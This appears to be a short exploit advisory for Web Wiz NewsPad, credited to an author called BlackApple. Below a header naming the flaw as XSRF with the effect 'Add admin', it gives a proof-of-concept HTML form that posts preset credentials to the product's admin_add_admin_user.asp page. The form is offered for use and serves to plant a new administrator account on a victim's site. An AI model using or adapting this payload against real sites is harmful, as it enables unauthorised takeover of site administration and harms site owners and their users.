< ------------------- header data start ------------------- >

#############################################################

# Application Name : Web Wiz NewsPad

# vulnerable Type : XSRF

# Infection : Add admin

# Home : Cyber-warrior.org

# author : BlackApple

# Demo : http://demo.webwiznewspad.com

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<title>BlackApple XSRF Vuln. </title>
<form action=victim.com/patch/admin_add_admin_user.asp method=post
<input type=text name=name2 size=15 value=kadi maxlength=15 />
<input type=password name=password size=15 value=sifreniz maxlength=15 />
<input type=password name=password2 size=15 value=yeniden sifreniz maxlength=15 />
<input type=submit name=Submit2 value=Yeni Admin Ekle />
</form>
< -- bug code end of -- >